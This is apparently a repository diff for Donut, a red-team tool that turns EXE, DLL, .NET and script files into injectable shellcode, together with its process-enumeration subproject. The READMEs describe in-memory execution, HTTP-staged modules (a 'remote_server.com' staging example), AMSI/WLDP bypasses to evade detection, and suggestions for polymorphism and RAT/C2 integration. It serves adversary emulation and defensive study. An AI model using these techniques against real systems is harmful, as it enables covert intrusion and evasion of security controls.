519 try
520 {
521 IntPtr pb = Marshal.AllocCoTaskMem(1000);
522 try
523 {
524 uint cb = 1000;
525 if (GetTokenInformation(hToken, TOKEN_INFORMATION_CLASS.TokenIntegrityLevel, pb, cb, out cb))
526 {
527 IntPtr pSid = Marshal.ReadIntPtr(pb);
528
529 int dwIntegrityLevel = Marshal.ReadInt32(GetSidSubAuthority(pSid, (Marshal.ReadByte(GetSidSubAuthorityCount(pSid)) - 1U)));
530
531 if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID)
532 {
533 return IntegrityLevel.Low;
534 }
535 else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID && dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
536 {
537 // Medium Integrity
538 return IntegrityLevel.Medium;
539 }
540 else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID)
541 {
542 // High Integrity
543 return IntegrityLevel.High;
544 }
545 else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID)
546 {
547 // System Integrity
548 return IntegrityLevel.System;
549 }
550 return IntegrityLevel.None;
551 }
552 else
553 {
554 return IntegrityLevel.Unknown;
555 }
556 }
557 finally
558 {
559 Marshal.FreeCoTaskMem(pb);
560 }
561 }
562 finally
563 {
564 CloseHandle(hToken);
565
566 }
567 }
568 }
569 catch (Win32Exception ex)
570 {
571 return IntegrityLevel.Unknown;
572 }
573
574 //If we made it this far through all of the finally blocks and didn't return, then return unknown
575 return IntegrityLevel.Unknown;
576 }
577 }
578 }
+36
-0
ProcessManager/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ProcessManager")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ProcessManager")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("98ca74c7-a074-434d-9772-75896e73ceaa")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+37
-0
ProcessManager/README.md less more
0 # ProcessManager
1
2 Has its own repo at: https://github.com/TheWover/ProcessManager
3
4 ps-like .NET Assembly for enumerating processes on the current machine or a remote machine (using current token). Has the unique feature of telling you whether each process is managed (has the CLR loaded). Compatible with .NET v3.5.
5
6 All enumeration is done with only built-in .NET APIs and PInvoke, rather than any third-party libraries or usage of WMI.
7
8 * PPID value of "-1" means that the parent is no longer running or is not accessible.
9 * Arch value of "*" means that the process could not be accessed or the architecture could not be determined. Usually a permissions issue.
10 * Managed value of "True" means that the CLR is loaded into the process. That is, it is a "managed" process because it is running .NET managed code.
11 * Integrity value of "Unknown" means exactly that.
12 * Blank User value means that the user information of the process could not be obtained.
13
14 **I have not tested ProcessManager's remote enumeration option. :-P Neither me nor Odzhan have a lab setup for testing that. Please feel free to let us know of any issues.**
15
16 ![Alt text](https://github.com/TheWover/ProcessManager/blob/master/img/usage.JPG?raw=true "General Usage")
17
18 # Usage
19
20 ```
21 | Process Manager [v0.2]
22 | Copyright (c) 2019 TheWover
23
24 Usage: ProcessManager.exe [options]
25
26 -h, --help Display this help menu.
27 --machine Specify a machine to query. Machine name or IP Address may be used.
28 --name Filter by a process name.
29
30 Examples:
31
32 ProcessManager.exe
33 ProcessManager.exe --name svchost
34 ProcessManager.exe --machine workstation2
35 ProcessManager.exe --machine 10.30.134.13
36 ```
ProcessManager/img/usage.JPG less more
Binary diff not shown
+287
-253
README.md less more
0 # Using Donut
1
2 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
3
4 Version: 0.9.2 *please submit issues and requests for v1.0 release*
5
6 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
7
8 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
9
10 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
11
12 ## Introduction
13
14 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
15
16 It can be used in several ways.
17
18 ## As a Standalone Tool
19
20 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
21
22 ```
23
24 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
25
26 -MODULE OPTIONS-
27
28 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
29 -u <URL> HTTP server that will host the donut module.
30
31 -PIC/SHELLCODE OPTIONS-
32
33 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
34 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
35 -o <payload> Output file. Default is "payload.bin"
36
37 -DOTNET OPTIONS-
38
39 -c <namespace.class> Optional class name. (required for .NET DLL)
40 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
41 -p <arg1,arg2...> Optional parameters or command line, separated by comma or semi-colon.
42 -r <version> CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
43 -d <name> AppDomain name to create for .NET. Randomly generated by default.
44
45 examples:
46
47 donut -f c2.dll
48 donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
49 donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe -u http://remote_server.com/modules/
50
51 ```
52
53 ### Building Donut
54
55 Tags have been provided for each release version of donut that contain the compiled executables.
56
57 * v0.9.2, Bear Claw:
58 * v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
59 * v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
60 * v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9
61
62 However, you may also clone and build the source yourself using the provided makefiles.
63
64 ## Building From Repository
65
66 From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.
67
68 ```
69 git clone http://github.com/thewover/donut
70 cd donut
71 ```
72
73 ## Linux
74
75 Simply run make to generate an executable, static and dynamic libraries.
76
77 ```
78 make
79 make clean
80 make debug
81 ```
82
83 ## Windows
84
85 Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:
86
87 ```
88 nmake -f Makefile.msvc
89 nmake clean -f Makefile.msvc
90 nmake debug -f Makefile.msvc
91 ```
92
93 ## As a Library
94
95 donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
96
97 ## As a Python Module
98
99 Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.
100
101 ```
102 pip install .
103 ```
104
105 Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.
106
107 ```
108 pip install donut-shellcode
109 ```
110
111 ## As a Template - Rebuilding the shellcode
112
113 *payload/* contains the in-memory loaders for PE/DLL/VBS/JS/XSL and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and Mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever files in the payload directory have been changed, recompiling for all architectures is recommended before rebuilding donut.
114
115 ### Microsoft Visual Studio
116
117 **Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**
118
119 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
120
121 ```
122 nmake clean -f Makefile.msvc
123 nmake -f Makefile.msvc
124 ```
125
126 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
127
128 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
129
130 ```
131 nmake clean -f Makefile.msvc
132 nmake x86 -f Makefile.msvc
133 ```
134
135 This will save the shellcode as a C array to *payload_exe_x86.h*.
136
137 ### Mingw-w64
138
139 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
140
141 ```
142 make clean -f Makefile.mingw
143 make -f Makefile.mingw
144 ```
145
146 Once you've recompiled for all architectures, you may rebuild donut.
147
148 ## Bypasses
149
150 Donut includes a bypass system for AMSI and other security features. Currently we bypass:
151
152 * AMSI in .NET v4.8
153 * Device Guard policy preventing dynamicly generated code from executing
154
155 You may customize our bypasses or add your own. The bypass logic is defined in payload/bypass.c.
156
157 Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.
158
159 Why do it this way? Because it means that only the bypass you are using is built into payload.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.
160
161 Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.
162
163 If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.
164
165 Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.
166
167 ### Additional features.
168
169 These are left as exercises to the reader. I would personally recommend:
170
171 * Add environmental keying
172 * Make donut polymorphic by obfuscating *payload* every time shellcode is generated
173 * Integrate donut as a module into your favorite RAT/C2 Framework
174
175 ## Disclaimers
176
177 * No, we will not update donut to counter signatures or detections by any AV.
178 * We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.
179
180 # How it works
181
182 ## Procedure for Assemblies
183
184 Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.
185
186 The logic above describes how the shellcode generated by donut works. That logic is defined in *payload.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *payload.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).
187
188 Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces
189
190 For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader
191
192 Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.
193
194 ## Procedure for ActiveScript/XSL
195
196 The details of how Donut loads scripts and XSL files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).
197
198 ## Procedure for PE Loading
199
200 The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).
201
202 ## Components
203
204 Donut contains the following elements:
205
206 * donut.c: The source code for the donut payload generator
207 * donut.exe: The compiled payload generator as an EXE
208 * donut.py: The donut payload generator as a Python script *(planned for version 1.0)*
209 * donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
210 * setup.py: The setup file for installing Donut as a Pip Python3 module.
211 * lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform
212 * lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform
213 * lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project
214 * payload/payload.c: Main file for the shellcode.
215 * payload/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
216 * payload/inmem_pe.c: In-Memory loader for EXE/DLL files.
217 * payload/inmem_xml.c: In-Memory loader for XSL/XML files.
218 * payload/inmem_script.c: In-Memory loader for VBScript/JScript files.
219 * payload/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
220 * payload/wscript.c: Supports a number of WScript methods that cscript/wscript support.
221 * payload/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP)
222 * payload/http_client.c: Downloads a module from remote staging server into memory.
223 * payload/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
224 * payload/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
225 * payload/inject.exe: The compiled C shellcode injector
226 * payload/inject.c: A C shellcode injector that injects payload.bin into a specified process for testing.
227 * payload/runsc.c: A C shellcode runner for testing payload.bin in the simplest manner possible
228 * payload/runsc.exe: The compiled C shellcode runner
229 * payload/exe2h/exe2h.c: Source code for exe2h
230 * payload/exe2h/exe2h.exe: Extracts the useful machine code from payload.exe and saves as array to C header file
231 * encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
232 * hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.
233
234 # Subprojects
235
236 There are three companion projects provided with donut:
237
238 * DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
239 * DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.
240 * ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
241 * ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded.
242
243 # Project plan
244
245 * ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
246 * Create a C# version of the generator.
247 * Create a donut.py generator that uses the same command-line parameters as donut.exe.
248 * Add support for HTTP proxies.
249 ~~* Find ways to simplify the shellcode if possible.~~
250 * Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design payloads that work with it.
251 * ~~Dynamic Calls to DLL functions.~~
252 * Handle the ProcessExit event from AppDomain using unmanaged code.
0 [![Issues](https://img.shields.io/github/issues/thewover/donut)](https://github.com/TheWover/donut/issues)
1 [![Contributors](https://img.shields.io/github/contributors/thewover/donut)](https://github.com/TheWover/donut/graphs/contributors)
2 [![Stars](https://img.shields.io/github/stars/thewover/donut)](https://github.com/TheWover/donut/stargazers)
3 [![Forks](https://img.shields.io/github/forks/thewover/donut)](https://github.com/TheWover/donut/network/members)
4 [![License](https://img.shields.io/github/license/thewover/donut)](https://github.com/TheWover/donut/blob/master/LICENSE)
5 [![Chat](https://img.shields.io/badge/chat-%23donut-orange)](https://bloodhoundgang.herokuapp.com/)
6 [![Github All Releases](https://img.shields.io/github/downloads/thewover/donut/total.svg)](http://www.somsubhra.com/github-release-stats/?username=thewover&repository=donut)
7 [![Twitter URL](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https://github.com/TheWover/donut&text=%23Donut+An+open-source+shellcode+generator+that+supports+in%2Dmemory+execution+of+VBS%2FJS%2FEXE%2FDLL+files:+https://github.com/TheWover/donut)
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 <p>Current version: <a href="https://thewover.github.io/TBD/">v0.9.3</a> <em>please submit issues and requests for v1.0 release</em></p>
12
13 <h2>Table of contents</h2>
14
15 <ol>
16 <li><a href="#intro">Introduction</a></li>
17 <li><a href="#how">How It Works</a></li>
18 <li><a href="#build">Building</a></li>
19 <li><a href="#usage">Usage</a></li>
20 <li><a href="#subproj">Subprojects</a></li>
21 <li><a href="#add">Additional Features</a></li>
22 <li><a href="#qad">Questions and Discussions</a></li>
23 <li><a href="#disclaimer">Disclaimer</a></li>
24 </ol>
25
26 <h2 id="intro">1. Introduction</h2>
27
28 <p><strong>Donut</strong> is a position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself. The module is optionally encrypted using the <a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a> block cipher and a 128-bit randomly generated key. After the file is loaded and executed in memory, the original reference is erased to deter memory scanners. The generator and loader support the following features:</p>
29
30 <ul>
31 <li>Compression of input files with aPLib and LZNT1, Xpress, Xpress Huffman via RtlCompressBuffer.</li>
32 <li>Using entropy for API hashes and generation of strings.</li>
33 <li>128-bit symmetric encryption of files.</li>
34 <li>Patching Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP).</li>
35 <li>Patching command line for EXE files.</li>
36 <li>Patching exit-related API to avoid termination of host process.</li>
37 <li>Multiple output formats: C, Ruby, Python, PowerShell, Base64, C#, Hexadecimal.</li>
38 </ul>
39
40 <p>There are dynamic and static libraries for both Linux and Windows that can be integrated into your own projects. There's also a python module which you can read more about in <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
41
42 <h2 id="how">2. How It Works</h2>
43
44 <p>Donut contains individual loaders for each supported file type. For dotNET EXE/DLL assemblies, Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. Once the CLR is loaded into the host process, a new Application Domain is created to allow for running Assemblies in disposable AppDomains. When the AppDomain is ready, the dotNET Assembly is loaded via the AppDomain.Load_3 method. Finally, the Entry Point for EXEs or public method for DLLs specified by the user is invoked with any additional parameters. Refer to MSDN for documentation on the <a href=" https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces">Unmanaged CLR Hosting API.</a> For a standalone example of a CLR Host, refer to <a href="https://github.com/TheWover/donut/blob/master/DonutTest/rundotnet.cpp">code here.</a></p>
45
46 <p>VBScript and JScript files are executed using the IActiveScript interface. There's also minimal support for some of the methods provided by the Windows Script Host (wscript/cscript). For a standalone example, refer to <a href="https://gist.github.com/odzhan/d18145b9538a3653be2f9a580b53b063">code here.</a> For a more detailed description, read: <a href="https://modexp.wordpress.com/2019/07/21/inmem-exec-script/">In-Memory Execution of JavaScript, VBScript, JScript and XSL</a></p>
47
48 <p>Unmanaged or native EXE/DLL files are executed using a custom PE loader with support for Delayed Imports, TLS and patching the command line. Only files with relocation information are supported. Read <a href="https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/">In-Memory Execution of DLL</a> for more information.</p>
49
50 <p>The loader can disable AMSI and WLDP to help evade detection of malicious files executed in-memory. For more information, read <a href="https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/">How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code</a>. It also supports decompression of files in memory using aPLib or the RtlDecompressBufferEx API. Read <a href="https://modexp.wordpress.com/2019/12/08/shellcode-compression/">Data Compression</a> for more information.</p>
51
52 <p>For a detailed walkthrough using the generator and how Donut affects tradecraft, read <a href="https://thewover.github.io/Introducing-Donut/">Donut - Injecting .NET Assemblies as Shellcode</a>. For more information about the loader, read <a href="https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/">Loading .NET Assemblies From Memory</a>.</p>
53
54 <p>Those who wish to know more about the internals should refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">Developer notes.</a></p>
55
56 <h2 id="build">3. Building</h2>
57
58 <p>There are two types of build. If you want to debug Donut, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">documentation here</a>. If not, continue reading for the release build.</p>
59
60 <h3>Clone</h3>
61
62 <p>From a Windows command prompt or Linux terminal, clone the repository.</p>
63
64 <pre>
65 git clone http://github.com/thewover/donut.git
66 </pre>
67
68 <p>The next step depends on your operating system and what compiler you decide to use. Currently, the generator and loader template for Donut can be compiled successfully with both Microsoft Visual Studio 2019 and MingGW-64. To use the libaries in your own C/C++ project, please refer to the <a href="https://github.com/TheWover/donut/tree/master/examples">examples provided here.</a></p>
69
70 <h4>Windows</h4>
71
72 <p>To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following:</p>
73
74 <pre>
75 nmake -f Makefile.msvc
76 </pre>
77
78 <p>To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following:</p>
79
80 <pre>
81 make -f Makefile.mingw
82 </pre>
83
84 <h4>Linux</h4>
85
86 <p>To generate the dynamic library donut.so, the static library donut.a and the generator donut. Change to the directory where you cloned the Donut repository and simply type make.</p>
87
88 <h3>Python Module</h3>
89
90 <p>Donut can be installed and used as a Python module. To install from source requires pip for Python3. First, ensure older versions of donut-shellcode are not installed by issuing the following command on Linux terminal or Microsoft Visual Studio command prompt.</p>
91
92 <pre>
93 pip3 uninstall donut-shellcode
94 </pre>
95
96 <p>After you confirm older versions are no longer installed, issue the following command.</p>
97
98 <pre>
99 pip3 install .
100 </pre>
101
102 <p>You may also install Donut as a Python module by grabbing it from the PyPi repository.</p>
103
104 <pre>
105 pip3 install donut-shellcode
106 </pre>
107
108 <p>For more information, please refer to <a href="https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md">Building and using the Python extension.</a></p>
109
110 <h3>Releases</h3>
111
112 <p>Tags have been provided for each release version of Donut that contain the compiled executables.</p>
113
114 <ul>
115 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.3">v0.9.3, TBD</a></li>
116 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.2">v0.9.2, Bear Claw</a></li>
117 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9.1">v0.9.1, Apple Fritter</a></li>
118 <li><a href="https://github.com/TheWover/donut/releases/tag/v0.9">v0.9.0, Initial Release</a></li>
119 </ul>
120
121 <p>Currently, there are two other generators available.</p>
122
123 <ul>
124 <li><a href="https://github.com/n1xbyte/donutCS">C# generator by n1xbyte</a></li>
125 <li><a href="https://github.com/Binject/go-donut">Go generator by awgh</a></li>
126 </ul>
127
128 <h2 id="usage">4. Usage</h2>
129
130 <p>The following table lists switches supported by the command line version of the generator.</p>
131
132 <table border="1">
133 <tr>
134 <th>Switch</th>
135 <th>Argument</th>
136 <th>Description</th>
137 </tr>
138
139 <tr>
140 <td>-a</td>
141 <td>arch</td>
142 <td>Target architecture for loader : 1=x86, 2=amd64, 3=x86+amd64(default).</td>
143 </tr>
144
145 <tr>
146 <td>-b</td>
147 <td>level</td>
148 <td>Behavior for bypassing AMSI/WLDP : 1=None, 2=Abort on fail, 3=Continue on fail.(default)</td>
149 </tr>
150
151 <tr>
152 <td>-c</td>
153 <td>class</td>
154 <td>Optional class name. (required for .NET DLL) Can also include namespace: e.g <em>namespace.class</em></td>
155 </tr>
156
157 <tr>
158 <td>-d</td>
159 <td>name</td>
160 <td>AppDomain name to create for .NET. If entropy is enabled, one will be generated randomly.</td>
161 </tr>
162
163 <tr>
164 <td>-e</td>
165 <td>level</td>
166 <td>Entropy level. 1=None, 2=Generate random names, 3=Generate random names + use symmetric encryption (default)</td>
167 </tr>
168
169 <tr>
170 <td>-f</td>
171 <td>format</td>
172 <td>The output format of loader saved to file. 1=Binary (default), 2=Base64, 3=C, 4=Ruby, 5=Python, 6=PowerShell, 7=C#, 8=Hexadecimal</td>
173 </tr>
174
175 <tr>
176 <td>-m</td>
177 <td>name</td>
178 <td>Optional method or function for DLL. (a method is required for .NET DLL)</td>
179 </tr>
180
181 <tr>
182 <td>-n</td>
183 <td>name</td>
184 <td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
185 </tr>
186
187 <tr>
188 <td>-o</td>
189 <td>path</td>
190 <td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
191 </tr>
192
193 <tr>
194 <td>-p</td>
195 <td>parameters</td>
196 <td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
197 </tr>
198
199 <tr>
200 <td>-r</td>
201 <td>version</td>
202 <td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
203 </tr>
204
205 <tr>
206 <td>-s</td>
207 <td>server</td>
208 <td>URL for the HTTP server that will host a Donut module.</td>
209 </tr>
210
211 <tr>
212 <td>-t</td>
213 <td>N/A</td>
214 <td>Create new thread for entrypoint of unmanaged EXE.</td>
215 </tr>
216
217 <tr>
218 <td>-w</td>
219 <td>N/A</td>
220 <td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
221 </tr>
222
223 <tr>
224 <td>-x</td>
225 <td>option</td>
226 <td>Determines how the loader should exit. 1=exit thread (default), 2=exit process.</td>
227 </tr>
228
229 <tr>
230 <td>-y</td>
231 <td>addr</td>
232 <td>Creates a new thread for the loader and continues execution at the address of host process.</td>
233 </tr>
234
235 <tr>
236 <td>-z</td>
237 <td>engine</td>
238 <td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
239 </tr>
240 </table>
241
242 <h2 id="subproj">5. Subprojects</h2>
243
244 <p>There are four companion projects provided with donut:</p>
245
246 <table border="1">
247 <tr>
248 <th>Tool</th>
249 <th>Description</th>
250 </tr>
251 <tr>
252 <td>DemoCreateProcess</td>
253 <td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</th>
254 </tr>
255 <tr>
256 <td>DonutTest</td>
257 <td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</th>
258 </tr>
259 <tr>
260 <td>ModuleMonitor</td>
261 <td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</th>
262 </tr>
263 <tr>
264 <td>ProcessManager</td>
265 <td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </th>
266 </tr>
267 </table>
268
269 <h2 id="add">6. Additional Features</h2>
270
271 <p>These are left as exercises to the reader. I would personally recommend:</p>
272
273 <ul>
274 <li>Add environmental keying.</li>
275 <li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
276 <li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
277 </ul>
278
279 <h2 id="qad">7. Questions and Discussion</h2>
280
281 <p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
282
283 <h2 id="disclaimer">8. Disclaimer</h2>
284
285 <p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
286
+106
-4
docs/2019-08-21-Python_Extension.md less more
3434
3535 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
3636
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
3838
3939 ```python
4040 import donut
4242 shellcode = donut.create(
4343 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
4444 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
